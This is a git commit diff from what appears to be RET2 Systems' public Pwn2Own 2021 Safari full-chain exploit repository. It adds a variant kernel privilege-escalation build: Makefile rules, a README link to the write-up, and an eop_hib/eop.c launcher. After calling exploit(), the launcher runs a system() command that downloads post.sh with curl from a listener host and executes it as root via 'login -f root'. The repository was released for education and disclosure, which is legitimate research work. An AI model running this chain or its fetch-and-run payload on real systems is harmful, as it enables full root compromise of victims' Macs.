add hib version of eop

Author: jman3323

Makefile

@@ -13,6 +13,7 @@ help:
 	@echo 'rebuilding:'
 	@echo '  `make rce-build` to re-determine jsc offsets (must have same version of Safari as target machine)'
 	@echo '  `make stage2-build` to recompile eop from source'
+	@echo '  `make stage2-build HIB=1` to recompile eop from source using __HIB version'
 	@echo '  `make postexploit-build` to recompile post-exploit from source'
 	@echo '  `make rebuild` to rebuild all 3'
 
@@ -42,7 +43,7 @@ rce-build:
 stage2-build:
 	make -C eop ksc
 	clang -E eop.c | sed $$'s/__NLHASH__/\\\n#/g' | clang -x c - -o eop.o $(SCFLAGS)
-	clang -E eop/eop_common.c -DFULLCHAIN | sed $$'s/__NLHASH__/\\\n#/g' | clang -x c - -o eop_common.o $(SCFLAGS)
+	clang -E eop$(if $(HIB),_hib,)/eop_common.c -DFULLCHAIN | sed $$'s/__NLHASH__/\\\n#/g' | clang -x c - -o eop_common.o $(SCFLAGS)
 	ld eop.o eop_common.o -o eop.dylib -dylib
 	python objcopy.py eop.dylib eop.bin
 	rm eop.o eop.dylib eop_common.o

README.md

@@ -1,7 +1,7 @@
 # Pwn2Own 2021 - Safari Full Chain
 
 This repo contains exploit source code used by [RET2 Systems](https://twitter.com/ret2systems) at [Pwn2Own 2021](https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results).
-It has been released for educational purposes, with accompanying blogposts for the [RCE](https://blog.ret2.io/2021/06/02/pwn2own-2021-jsc-exploit) and [EOP](https://blog.ret2.io/2022/06/29/pwn2own-2021-safari-sandbox-intel-graphics-exploit/).
+It has been released for educational purposes, with accompanying blogposts for the [RCE](https://blog.ret2.io/2021/06/02/pwn2own-2021-jsc-exploit) and [EOP](https://blog.ret2.io/2022/06/29/pwn2own-2021-safari-sandbox-intel-graphics-exploit/). A [followup post](https://blog.ret2.io/2022/08/17/macos-dblmap-kernel-exploitation/) covers a modified EOP that bypasses KASLR in a different manner (corresponding to the `eop_hib` directory here).
 
 The exploit was demonstrated on Safari 14.0.3, macOS Big Sur 11.2.3.
 The Safari vulnerability was patched in Safari 14.1.1, assigned CVE-2021-30734.

eop_hib/Makefile

@@ -0,0 +1,16 @@
+# set pipefail so piped commands' errors arent ignored
+SHELL = /bin/bash -o pipefail
+
+SCFLAGS = -Wall -c -Os -fno-stack-protector -mno-sse -fno-unwind-tables -fno-exceptions
+
+.PHONY: eop
+eop: ksc
+	clang eop.c eop_common.c -o eop -Wall -Os -framework IOKit -framework CoreFoundation
+
+.PHONY: ksc
+ksc:
+	clang kernel_sc.c -o kernel_sc.o $(SCFLAGS)
+	ld kernel_sc.o -o kernel_sc -dylib
+	python3 objcopy.py kernel_sc kernel_sc.bin
+	(echo GLOB && xxd -i kernel_sc.bin) | grep -v len > kernel_sc.h
+	rm kernel_sc.o kernel_sc kernel_sc.bin

eop_hib/eop.c

@@ -0,0 +1,20 @@
+#include "eop_common.h"
+extern int sandbox_init_with_parameters(char*, int, char**, char**);
+
+int main(int argc, char** argv) {
+    if (argc >= 2 && !strcmp(argv[1], "-s")) {
+        char* errstr = 0;
+        char* params[] = {"HOME_DIR", 0, "WEBKIT2_FRAMEWORK_DIR", 0, "DARWIN_USER_CACHE_DIR", 0, "DARWIN_USER_TEMP_DIR", 0, "HOME_LIBRARY_PREFERENCES_DIR", 0, 0, 0};
+        for (int i = 0; params[i]; i+=2)
+            params[i+1] = "/tmp";
+        if (sandbox_init_with_parameters("/System/Library/Frameworks/WebKit.framework/Resources/com.apple.WebProcess.sb", 3, params, &errstr)) {
+            printf("couldnt init sandbox: %s\n", errstr);
+            return 1;
+        }
+        printf("initialized sandbox\n");
+    }
+    exploit();
+    printf("done\n");
+    system("curl -o /tmp/post.sh http://0.0.0.0:5151/post.sh && chmod +x /tmp/post.sh && echo 0.0.0.0 > /tmp/ip && login -f root /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal /tmp/post.sh");
+    return 0;
+}